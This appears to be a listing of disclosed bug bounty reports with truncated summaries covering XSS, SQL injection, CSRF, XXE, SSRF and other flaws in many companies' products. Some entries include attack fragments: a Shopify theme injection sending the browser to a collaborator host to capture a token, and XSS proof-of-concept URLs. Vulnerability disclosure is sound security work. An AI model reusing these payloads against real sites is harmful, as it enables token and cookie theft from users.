Internet Bug Bounty: null pointer dereference in imap_mail

in imapmail if message args is null, in phpimapmail no check wheater message can get, so crash. fprintfsendmail, "\n%s\n", message; /usr/local/php/bin/php ./craxxx.php Warning: imapmail: No message string in mail command in /home/fan/github/php-7.2.10/myselffuzz/craxxx.php on line 3 sh: 1: -t: no...

Mail.ru: xss

XSS was reported for bb.cdn.gmru.net domain. This domain is considered sandbox with no security impact for XSS, but same XSS also existed in bb.mail.ru subdomain...

HackerOne: Information disclosure

Summary: Chaining few simple informative issues on HackerOne platform and applying new method of timing attack, exploiting interesting feature in HTML5 https://developer.mozilla.org/en-US/docs/Web/API/ResourceTimingAPI/UsingtheResourceTimingAPI more precise Copy with CORSwe can perform low cost,...

LocalTapiola: Reflected XSS+CSRF on secure.lahitapiola.fi

Basic report information Summary: The secure.lahitapiola.fi -mail application contains a reflected XSS vulnerability which can be exploited for example with CSRF-attack. Description: As mentioned in the summary, the site contains a reflected cross-site scripting vulnerability. This vulnerability ...

Coinbase: Ethereum account balance manipulation

The researchers noticed an issue with our ETH receiving code when receiving from a contract. This allowed sending of ETH to Coinbase to be credited even if the underlying contract execution failed. The issue was fixed by changing the contract handling logic. Analysis of the issue indicated only...

Gratipay: i am The bug

I am the bug i found a bug in your site here it is F234717 my friend are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me u will giv me $$$ for my father F234723...

VK.com: CSRF Добавить просмотр к записи без ведома пользователя.

Отсутствие параметра hash при учете просмотра записей. Отсутствовал параметр hash при учете просмотра записей. Можно было вести массовую накрутку просмотров на посты. При этом просмотры крутились даже в частную группу, несмотря на то, что у нас к ней не было доступа. POC выглядел так:...

Zomato: SQL Injection, exploitable in boolean mode

Issue The reporter found a SQL injection in one of the applications in www.zomato.com. Fix The issue was investigated and found to be valid and fixed...

Airbnb: Nginx Version Disclosure

Hello, While i was testing airbnb i found nginx version disclosure in HTTP Response. Which can help attacker to gain information or an attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified. URL: https://www.airbnb.com/ Version: 1.7.12...

Ubiquiti Inc.: XSS via SVG file

Hello Ubuquiti, Details I was able to upload an svg file to here. so i uploaded an SVG file with XSS on its code and if the attacker give the link to his victim he can grab it's victim's cookie. and regarding to the your Upload image svg file it uploaded even it has an error.. PoC link F167791 Fi...

LocalTapiola: SQL Injection on `/cs/Satellite` path

Summary There exists an SQL Injection vulnerability on the path /cs/Satellite. This path accepts numerous fields, including blobtable, blobcol, blobkey and blobwhere. It is possible to sufficiently manipulate the the blobwhere field in order to trigger a time-based blind SQL Injection attack. Sco...

Uber: Reading Emails in Uber Subdomains

Possibility to read emails from various Uber subdomains. None of the domains exposed were actively being used for Uber email communication to employees or users. Possibility of reading emails sent to certain Uber domains. Link to blog:...

Uber: Server version disclosure

Hi uber, maybe this is a low risk but i want to report that the nginx and openresty server version are being disclosed. For openresty: Accessing this url: https://chef.uberinternal.com/ will give you an error "502 Bad Gateway" but you can see on the page that the server version was disclose...

Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses

Hello, Issue descripton your incoming SMTP servers, provided by google , seems to be accepting without authentication mails from addresses @paragonie.com and destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...

Uber: Phone Number Enumeration

I discovered it is possible to retrieve all Uber's customer's cell phone numbers using an API endpoint. While going through a sign up form, I noticed that the page was making an ajax call to an API to validate the email address being entered and to make sure it doesn't already belong to an accoun...

Zendesk: [CRITICAL] CSRF leading to account take over

Hi , I have found a CSRF issue in .zendesk.com/jobs/createjob that leads to full account take over. Details: When using bulk user import in https://.zendesk.com/import?kind=user after you upload a CSV file and press import , a request is sent to...

QIWI: XML External Entity (XXE) in qiwi.com + waf bypass

While testing tax payment service, I found that your server endpoint https://qiwi.com/order/external/multiple.action is vulnerable to XML External Entity Attack. Despite server doesn’t response with any information, attacker can still use out-of-band XXE technique to read arbitrary files on serve...

Mail.ru: [odnoklassniki.ru] XSS via Host

XSS через Host заголовок в браузере Internet Explorer с использованием ошибки перенаправления. PoC: http://blackfan.ru/x?r=http://odnoklassniki.ru%252f%253f%2523"alertdocument.domain" http://blackfan.ru/x?r=http://ok.ru%252f%253f%2523"alertdocument.domain" HTTP Response:...

HackerOne: Accepting Invalid characters on email address

I tried to change my email address on hackerone.com.And when I tried adding null Bytes,it was being accepted by hackerone.com. I am registered wth ███ and I tried to change my email address to ████%00 And guess what,this address was granted as an email address...

curl: Security Analysis Report: CURL Integer Overflow Vulnerability

Vulnerability Overview Vulnerability Type: Integer Overflow in HTTP chunked encoding Location in Source: lib/httpchunks.c line 173 lib/curlx/strparse.c lines 185–186 Impact: Integer overflow leads to memory corruption Can cause buffer overflow Results in Denial of Service DoS for curl Potential...

curl: Incorrect Encoding Conversion in hostname results in indeterminate SSRF vulnerabilities

Vulnerability description not provided...

FetLife: Able to see highest poll result without voting or view result

Vulnerability description not provided...

Internet Bug Bounty: Cargo not respecting umask when extracting crate archives

Cargo did not respect the umask when extracting crate archives on UNIX-like systems, potentially allowing a local attacker to modify the source code compiled and executed by the current user...

Internet Bug Bounty: CRLF Injection in Nodejs ‘undici’ via host

A vulnerability was discovered in the fetch API of Node.js versions 16.x, 18.x, and 19.x that allowed for CRLF injection in the 'host' header, potentially leading to attacks such as HTTP response splitting and HTTP header injection. The vulnerability was fixed in security releases...

Nextcloud: Mail app - blind SSRF via smtpHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...

KAYAK: 1 click Account takeover via deeplink in [com.kayak.android]

Vulnerability description not provided...

Internet Bug Bounty: CVE-2022-30115: HSTS bypass via trailing dot

Advisory: https://curl.se/docs/CVE-2022-30115.html Original Report: https://hackerone.com/reports/1557449 Impact HSTS bypass...

HackerOne: Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid}

Summary: Hi, While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com". http://web.archive.org/cdx/search/cdx?url=app.pullrequest.com/&output=text&fl=original&collapse=urlkey One of them was...

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

A vulnerability in the web services interface of Cisco Adaptive Security Appliance ASA Software and Cisco Firepower Threat Defense FTD Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...

GitHub Security Lab: New experimental query: Clipboard-based XSS

This bug was reported directly to GitHub Security Lab...

U.S. Dept Of Defense: XSS on ███

Hi , I found XSS on ██████████ IP Enumeration ████ go to https://███/+CSCOE+/logon.html?a0=15&a1=&a2=&a3=1 intercept the request by burp suite and send it to repeater then edit the request to be like this GET /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ██████████ User-Agent: Mozilla/5.0 Windows ...

h1-ctf: ccc ctf

██████████ will send detailed report later Impact can get admin credentials...

UPchieve: User enumeration through forget password

Vulnerability:- -User enumeration is possible through forgot password feature. steps to reproduce:- -Go to the above selected domain and go to forgot password. -submit random email and then intercept request by burp suit -in response you will get HTTP/1.1 500 Internal Server Error with "err":"No...

Internet Bug Bounty: Buffer overflow in PyCArg_repr in _ctypes/callproc.c for Python 3.x to 3.9.1

TL;DR Description Python 3.x through 3.9.1 has a buffer overflow in PyCArgrepr in ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to cdouble.fromparam. This occurs...

Shopify: Screenshot Service leaks X-ABS-App-Token

Login and create a development store 2. Start Burp Suite and open a burp collaborator client then copy the collaborator payload 3. Edit the section header.liquid of your current theme. Adding this: window.location="https://pasteherecollaborator/"; Finally go to...

Acronis: Get ip and Geo location any user via Clickjacking with inspectlet technology

Summary Get ip and Geo location any user via Clickjacking with inspectlet technology https://geoapi.acronis.com/?q=admin/views/ajax/autocomplete/user/a Steps To Reproduce 1. go to F1015419 2. will watch your geo data ex. "city":"Abu...

PlayStation: Unrestricted access to quiesce functionality in dss.api.playstation.com REST API leads to unavailability of application

Report Summary ---- Unrestricted access to the quiesce function via a PUT request to https://dss.api.playstation.com/api/application/state makes the application unreachable for an uncertain amount of time. Steps To Reproduce ---- Reproduction method 1 + Burp Suite is the program required for the...

Internet Bug Bounty: CVE-2020-9383 Floppy OOB read

A vulnerability was found in Linux Kernel up to 5.5.6 Operating System and classified as critical. Affected by this issue is the function setfdc of the file drivers/block/floppy.c. The manipulation with an unknown input leads to a memory corruption vulnerability Out-of-Bounds. Using CWE to declar...

h1-ctf: [H1-2006 2020] Solution for the h1-2006 CTF challenge

Hi, The flag is ^FLAG^736c635d8842751b8aafa556154eb9f3$FLAG$. I didn't know I can send it prior to the report until I saw some disclosed solutions from the previous challenges. The report will follow later today. Regards @thehackerish Impact Multiple vulnerabilities on .bountypay.h1ctf.com allow ...

Topcoder: Reflected XSS on error page on https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action

Hi : In https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action bookmarkPageId parameter expects a number value. If you add XSS payload instead of number, an error page displays with XSS. PoC...

Basecamp: CSRF on launchpad.37signals.com OAuth2 authorization endpoint

Hi, I found a CSRF in the OAuth2 authorization endpoint on launchpad.37signals.com. That allows a malicious 3rd party application to gain full API access to victim's account in 37signals products that uses OAuth2 authorization. I found that when making a post request to authorization endpoint it...

Glassdoor: web.xml configuration file disclosure

Information disclosed via https://www.glassdoor.com/web.xml which has been resolved. Thanks, @stregh for your report and find. Looking forward to more reports from you. CVE-2021-34429 CVSS Score: 5.0 CVSS Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N...

Cuvva: Unclaimed facebook page at www.cuvva.com/about

Description: Hello sir, while I was surfing your website I found unclaimed facebook page at www.cuvva.com/about F503171 when you click this button you will be redirected to https://www.facebook.com/getcuvvad which was unclaimed but I claimed it as poc steps to reproduce: 1. go to...

Valve: Unchecked weapon id in WeaponList message parser on client leads to RCE

Let's look at WeaponList message parser code in the HLSDK: cpp int CHudAmmo::MsgFuncWeaponListconst char pszName, int iSize, void pbuf BEGINREAD pbuf, iSize ; WEAPON Weapon; strcpy Weapon.szName, READSTRING ; Weapon.iAmmoType = intREADCHAR; Weapon.iMax1 = READBYTE; if Weapon.iMax1 == 255...

Monero: Zero-amount miner TX + RingCT allows monero wallet to receive arbitrary amount of monero

NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report! Summary: By mining a...

Tron Foundation: DOS attack by consuming all CPU and using all available memory

Summary: A single request to submit a post to /wallet/deploycontract with several megabytes of bytecode along with CPU intensive long parsing will consume CPU for about 10 minutes while still holding several megabytes of bytecode in heap. With enough requests lets say 1K-10K depending upon...

MyCrypto: SPF Records (SMTP protection not used)

Hello MyCrypto Team , I am checking your website and found something is missing in SPF record.I don't find you have applied strict SMTP policy to stop spoofed email sending from your domain. I would like to recommend you to read the following article :...

Ubiquiti Inc.: Public Jenkins instance with /script enabled

Hi, First of all. I'm not 100% able to verify that this server is actually owned by Ubnt as there are multiple DNS Name's in the SSL certificate. DNS Name: .uum.com DNS Name: .ubnt.com DNS Name: .svc.ubnt.com DNS Name: .api.uum.com DNS Name: .svc.uum.com DNS Name: uum.com So, the server hosted on...

WordPress: Account takeover vulnerability by editor role privileged users/attackers via clickjacking

Vulnerability - Editor role privileged users are able to hack into other's account by exploiting clickjacking vulnerability. Version- 4.9.7 Issue- https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/why-are-some-users-allowed-to-post-unfiltered-html As mentioned pe...

Automattic: RCE via Print function [Simplenote 1.1.3 - Desktop app]

In Simplenote 1.1.3 - Desktop app there is a stored XSS vulnerability that can be used to execute arbitrary code. If there is malicious code in the note and the user tries to print it for example to save it as a PDF, the malicious code runs. This report is based on the report 291539, by Yasin...